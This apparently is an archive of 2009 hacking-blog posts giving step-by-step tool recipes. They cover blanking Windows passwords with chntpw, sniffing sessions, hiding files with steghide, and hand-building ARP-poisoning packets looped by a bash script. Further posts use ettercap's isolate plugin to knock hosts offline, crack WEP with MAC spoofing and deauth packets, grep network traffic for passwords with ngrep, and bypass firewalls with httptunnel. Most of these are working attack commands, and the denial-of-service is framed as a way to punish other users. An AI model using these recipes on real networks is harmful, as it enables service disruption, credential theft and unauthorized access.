NOTE: It is known that changing the user's passwords here are less reliable to work than actually just resetting/blanking their passwords. I would suggest to just blank the passwords if applicable then when you get into windows, change the passwords their. Use an "*" to Blank passwords in the interactive screens in chntpw.
Remember to save your changes before you exit.
Reebot computer and login to windows to see if your hack worked (more than likely it did)

For more chntpw options (although you probably wont need nothing else), type:
# chntpw -h

#chntpw help and usage

chntpw version 0.99.3 040818, (c) Petter N Hagen
chntpw: change password of a user in a NT SAM file, or invoke registry editor.
chntpw [OPTIONS] [systemfile] [securityfile] [otherreghive] [...]
-h This message
-u Username to change, Administrator is default
-l list all users in SAM file
-i Interactive. List users (as -l) then ask for username to change
-e Registry editor. Now with full write support!
-d Enter buffer debugger instead (hex editor),
-t Trace. Show hexdump of structs/segments. (deprecated debug function)
-v Be a little more verbose (for debuging)
-L Write names of changed files to /tmp/changed
-N No allocation mode. Only (old style) same length overwrites possible
See readme file on how to extract/read/write the NT's SAM file
if it's on an NTFS partition!
Source/binary freely distributable. See README/COPYING for details
NOTE: This program is somewhat hackish! You are on your own!

Resources/Good reading:
http://home.eunet.no/~pnordahl/ntpasswd/index.html
http://linuxbasement.com/content/changing-nt-passwords-with-linux-and-chntpw
http://rhadimas.wordpress.com/2006/10/15/reset-windows-password-w-knoppix/

Sniffit, packet sniffer and monitoring tool

2009-12-02T12:45:00.000-08:00

Sniffit is a nice little sniffer that gives you the ability to zoom in on already established connections and view the data. Its mainly useful in MITM situations. Picture being in the middle of a telnet session or in the middle of a netcat chat. With sniffit, you can watch the communications going back and forth and possible gaain the knowledge of confidential info.

To run sniffit:
# sniffit -i -F eth0 //opens up sniffit in [-i]nteractive mode and [-F]orces the program to listen on the specified interface

To listening in (zoom into) a connection just hit the Enter key. To get out of it, hit the "q" key. For some useful satatistics hit the "n" key. to completly close out of the program hit the "q" key again.

Steganography (using steghide)

2009-12-01T09:25:00.000-08:00

Steganography is the ability to hide data in plain site. Hidden messages are hidden in such a way that no one other than the sender and the intended recipient should be aware of its existence. What that means is the picture that someone may have sent to you and a few other people could possible contain a hidden message and possibly only one or two of the recipients may know of its existence.

Steghide is a steganography program that has the ability to hide data in various image and audio file formats. The embeded data can be compressed and encrypted. Some supported file formats are JPEG, BMP, WAV and AU. There are no restrictions on the format of what the secret data should be. It runs on both Windows and linux OS's

Demo:
Create a text file and type something in it that you wish to hide[name it confidential.txt].

Next, locate a jpg or bmp file that you would like to use as the cover file to hide the text file into.
When you get your image file run this command to test its storage capacity:
# steghide info image_file.jpg

Next lets embed our confidental.txt in the image file. By default, the embeded data would be encrypted with rijindale(aes - 128 bit) encryption in cbc mode. Note you would have to enter a password.
# steghide embed -cf image_file.jpg -ef confidential.txt

To extract the file run the following command then enter the password:
# steghide extract -sf image_file.jpg

Thats all to it.

[options]
"-cf": cover file to use
"-ef": file we want to hide
"-sf": this is the name of the stego file that we have created
"-e": specify encryptionto use if the default doesnt suit you.

To find out about the other encryption algorithms that you can use type:
# steghide encinfo

Resources/Good reading:
http://steghide.sourceforge.net/
http://en.wikipedia.org/wiki/Steganography
http://linux.die.net/man/1/steghide

Manually modifying a Network packet, the way the pro's do it

2009-11-30T16:40:00.000-08:00

In my previous post, i spoke about using ettercap and and a plugin "Isolate", to take down a host on a network. It poisons the arp cache of the victim's machine into linking its own mac address to the router's/gateway's IP address, thus achieving a complete denial of service (google:DOS attact). In this post, im gonna be discussing how you can perform such an attack using a more manual method, manually constructing the malicious packet.

File2cable is a simple program that sends a file as a raw ethernet frame over a specified interface.

Hexedit is a simple hex editor for unix machines.

In this demo, we are going to isolate a host,just like we did with ettercap and it's Isolate plugging.

The first thing that you want to do is to use wireshark and capture a "ARP reply" packet. When you got that packet (to use as a prototype), export that frame/packet bytes to a file (for this example, ill name the file "arp_reply"). Open the file with hexedit (# hexedit -b arp_reply). Now, the idea behind modifying the packet is knowing what to change. You want to have wireshark and hexedit opened side by side so you are watching both screens. In wireshark pay attention to the hexdump frame at the bottom While doing that, in the frame above that select the layer 2 frame(Ethernet II) and notice that a certain amount of bytes are selected in the hexdump below. The selected bytes are a representation of the ethernet frame. Now within that ethernet frame, break it down to tree view and select destination. Notice the selection in the hexdump now. Anything familiar about the hex bytes selected? Its the destination mac address. Now you can select other items in the Ethernet frame II portion and notice the different hex representations for your selections. Now we can change these things using hexedit. We use wireshark as a reference so we know which hex bytes to change in hexedit. This is the main idea of manually altering a packet.

Now im going to tell you everything that you need to change using hexedit. Please note that we are in the hex realm of things, the changes you are going to make are gonna be the hex representations of certain values(Note that the mac address is already in HEX, so no conversion necessary)

[Ethernet II]
Destination: Set this to the mac address of the target host (victim who's arp table we are going to poison)
Source: Set this to your network interface's mac address (put the real thing otherwise it wont work)

[ARP]
Sender MAC address: You must set this to the target host's own mac address (we poison his cache here)
Sender IP address: We set this to the router/gateway's IP address in hex of course
Target MAC address: We set this to the targets mac
Target IP address: we set this to the targets IP address

Press ctrl+x then hit the enter key, to exit and save the packet you just modified. Now to test this attack, on your victims machine, pull up a command prompt and check your arp cache (arp -a). Make a note of your routers ip to mac address mapping. Next send our packet/file onto the wire/network with file2cable, which can also be used in wireless networks as well (# file2cable -i eth0 -f arp_replay). Now go check the arp cache on the victims machine. See the difference? If you try browsing to websites and things dont work, then it worked and this machine has been taken down.

Since a computer's arp cache normally refreshes around every 5 minutes, our attack wont be very long term. What we can do is right a script that would send our malicious packet ever few seconds. We use secounds instead of minutes because the router can send a arp request to the victim and when the victim reponds accordingly, the victim naturally will learn the mac to ip mappings of the arp requester. We can write a script as follows:

#!/bin/bash

while[1];do
file2cable -i eth0 -f arp_reply
sleep 10
done

The above script will loop the file2cable commands every 10 seconds.

Here is a quick visual from an arp cache poisoning attack using hexedit and wireshark to capture and modify an arp packet: http://www.docstoc.com/docs/9852261/ARP-Spoofing-Tutorial.
It should give you an idea visually what you have to do/change when using wireshark and hexedit in conjunction. However, please note that they are performing a different attack from what i demonstrated here. If you think you have my example convered, try their example next and get a good feel for things.

Resources/Good reading:
http://www.docstoc.com/docs/9852261/ARP-Spoofing-Tutorial

Take down any host on a network using Ettercap's plugin Isolate

2009-11-30T15:49:00.001-08:00

Ettercap is a very popular password sniffer and packet analyzer. It comes pre-built with many plugins, including isolate in which im gonna briefly discuss here. This plugging allows you to literally take down a host on a network. For example, if you find out that you have a user using the internet for malicious purposes, why not just take him out? The theory behind this attack lies around poisoning the users arp cache. Since a computer on your LAN that communicates on the interenet relies on knowing what the mac address of the gateway or router is, it wont be hard to imagine what would happen if we tell your machine that in order to get to internet, send all packets to another mac address. More interestingly, say the router's ip address is 192.168.1.1, if we poison the arp cache of a machine to link the routers address or 192.168.1.1 to that computer's own mac address what would result is a complete denial of service. Whenever that users machine tries communicate on the web, all his packets would be send to his own mac address. Talk about a state of confusion

This attack may take up to 5 mins to work. It relies on the arp cache entry to time out before it needs to refresh it self.

# ettercap -Tq -i eth0 -P isolate /192.168.1.103/ //

The above command would complete take the host 192.168.1.103 down. You can run ipconfig /all on you windows machine and arp -a, then compare the mac address. If they are the same, then you just pwned that machine. Now you can tell those pesky torrent whores just before you take them down, "Say hello to my lil friend.....".....Isolate.

Resources/Good reading:
http://wcosughacking.blogspot.com/2008/07/isolate-ip.html

Cracking WEP with aircrack-ng ( cheat sheet)

2009-11-30T08:12:00.000-08:00

We all should by now be aware of the famous insecurities of the wireless encryption WEP. Because of its implimentation of weak IVs (initialization vectors) in the packets, it becomes quite easy to guess certain packets (arp broadcast for example). The idea behind the attack is to capture enough packets so a program like aircrack can perform some analysis on the capture IVs and hence derive what the WEP key should be. We would be using the aircrack-ng suite of tools to crack us some WEP. Please perform this attack on your own network. This should be used only to audit the security of your own network or neworks to whom you have the right permissions to audit.

[Cheat sheet] using Bactrack4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your mac address to a random fake one
# ifconfig wlan0 up //bring back up the wireless intereface
# airmon-ng start wlan0 //create an interface that listens on monitor mode
# airodump-ng mon0 //analyze the air for potential WEP targets
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_tacgetAP" -w wep.pcap mon0 //start capturing packets of your intended victim
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --fakeauth 0 mon0 //perform a fake authentication to access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "Connected_client_mac_address" mon0 //Send deauth packets to disconnect a client from the target access point
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" -3 mon0 //perform arp replay attack to speed up the data retrieval process
#aircrack-ng -b "mac_address_of_targetAP" -P 2 wep.pcap-01.pcap //when there is enough packets (10000 or more) use aircrack this way to attemp to crack the WEP key

Thats it ...
Please use google to find out more information about the insecurities of WEP.

Ngrep

2009-11-28T11:20:00.000-08:00

Ngrep is a basic packet sniffer with its main feature being the ability to filter through network packets, searching(grep) for certain strings in the packets being sent over a network and display the matching string's packet content in a readable format. Think of it like unix's grep but done over network streams. Ngrep uses standard tcpdump filters, host 192.168.1.1, port 80, etc.

Examples:

# ngrep -d eth0 port 80 // displays all port 80 traffic on interface eth0

# ngrep -d eth0 "google.ca" port 80 // parses through port 80 traffic data for string google.ca

# ngrep -d eth0 "*.google.ca" port 80 // parses through port 80 traffic for *.google.ca, where the * can be anything.

For better visual output add "-W byline" option

# ngrep -d eth0 -W byline "msn.com" port 80

To search for more than one string

# ngrep -d eth0 -W byline -i "pass|USER" -n 2 port 80 // searches for string 'pass' or 'USER'. "-i" ignores the case of pass or USER. "-n 2" will match only 2(any number can be specified) packets total, then exit.

# ngrep -n 2 -q -d eth0 -W byline -wi "pass|USER" port 80 // searches for string 'pass' or 'USER'. "-i" ignores the case of pass or USER. The "-w" tells ngrep to match the string as a word. "-q", quiet mode; don't output any information other than packet headers and their payloads (if relevant).

The following can parse for logins to gain passwords:

# ngrep -d eth0 -W byline -i "pass|USER" port 80 |grep pass

More examples mimiced from: http://www.brandonhutchinson.com/ngrep.html

Usage examples:
ngrep '' udp (print all UDP packets)
ngrep '' icmp (print all ICMP packets)
ngrep '' port 53 (print TCP or UDP port 53 packets)
ngrep '' tcp port 23 (print TCP port 23 packets)
ngrep 'LILWORD' port 138 (print Microsoft browsing traffic for NT domain LILWORLD)
ngrep -iq 'rcpt to|mail from' tcp port 25 (monitor current delivery and print sender and recipients)
ngrep 'user' port 110 (monitor POP3)
ngrep -q 'abcd' icmp (Microsoft operating systems fill the ICMP payload with the alphabet; is the "pinging" host running a Microsoft operating system?)
ngrep -iq 'user-agent' tcp port 80 (determine client application that client host is running)
ngrep '220' port 21 (determine version of FTP server)
ngrep 'SSH' port 22 (investigate Secure Shell)
ngrep -v '' port 23 (see all traffic but telnet)

Resources/Good reading:
http://ngrep.sourceforge.net/usage.html
http://www.linux.com/archive/articles/46268
http://www.security-freak.net/tools/ngrep/ngrep.html
http://www.brandonhutchinson.com/ngrep.html

HTTPtunnel, Another way to tunnel your traffic to bypass firewalls

2009-11-27T11:55:00.000-08:00

Like the title says, Httptunnel allows you to create a tunnel (non-encrypted i might add) so you can redirect ports or by pass firewalls. Its not the most preferred method to tunnel traffic as there is no encryption mechanism to keep your actions hidden like ssh tunneling or stunnel would offer. Never the less, its a easy utitility to get up and running quickly and works on both linux and windows system.

[server]linux, 10.0.0.1
[client]windows, 10.0.0.2

On the server [linux]:
For this, you are required to have some sort of service running locally. We are gonna use a webserver on port 80. Start the webserver and have a demo index.html page in the necessary folder so clients would be greeted with a page. Then run the httptunnel server as follows:
# ./hts -F 127.0.0.1:80 4444 //Listens on port 4444, and forwards all traffic to itself (127.0.0.1) on port 80

On the client [windows]:

c:\>htc.exe -F 5555 10.0.0.1:4444 //Listens on port 5555 and connects to the awaiting httptunnel server at 10.0.0.1 on port 4444

Now on the client, open up a web browser and type in the url, http://127.0.0.1:5555. If everything works fine, you should be greeted with the webpage at 10.0.0.1

Resources/Good reading:
http://www.nocrew.org/software/httptunnel.html
http://en.wikipedia.org/wiki/HTTP_tunnel
http://www.neophob.com/serendipity/index.php?/archives/85-GNU-HTTPtunnel-v3.3-Windows-Binaries.html
http://sebsauvage.net/punching/